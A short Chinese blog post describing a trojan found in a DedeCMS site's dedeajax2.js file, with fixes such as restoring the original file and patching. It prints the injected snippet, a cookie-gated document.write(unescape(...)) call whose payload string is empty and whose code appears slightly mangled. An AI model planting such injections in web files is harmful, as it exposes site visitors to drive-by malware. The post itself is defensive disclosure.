dedecms:dedeajax2.js被植入js木馬

    這陣子我的一個網(wǎng)站被植入了木馬，程序dede。于是我升級到了IE7＋全補丁，為了查木馬做準備工作，呵呵。結果發(fā)現(xiàn)，dedeajax2.js被植入了木馬。源碼如下：
    //初始化xmldom
    function InitXDom(){
    if(DedeXDOM!=null) return;
    var obj = null;
    if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
    var parser = new DOMParser();
    obj = parser.parseFromString(xmlText, "text/xml");
    } else { // IE
    try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
    if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
    }
    DedeXDOM = obj;
    };
    //以下是被植入木馬的部分，亂碼都是經(jīng)由unicode碼處理?，F(xiàn)在的馬夫越來越狡猾了
    if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
    用原版本的dedeajax2覆蓋，即可。這個文件，dede的模板都要用到，搜索了，沒有發(fā)現(xiàn)說明用處。
    不過建議大家，多注意dedecms的官方補丁，unix服務器的站長，千萬別所有文件都是設置，雖然dede在unix的服務器上，設置太過繁瑣。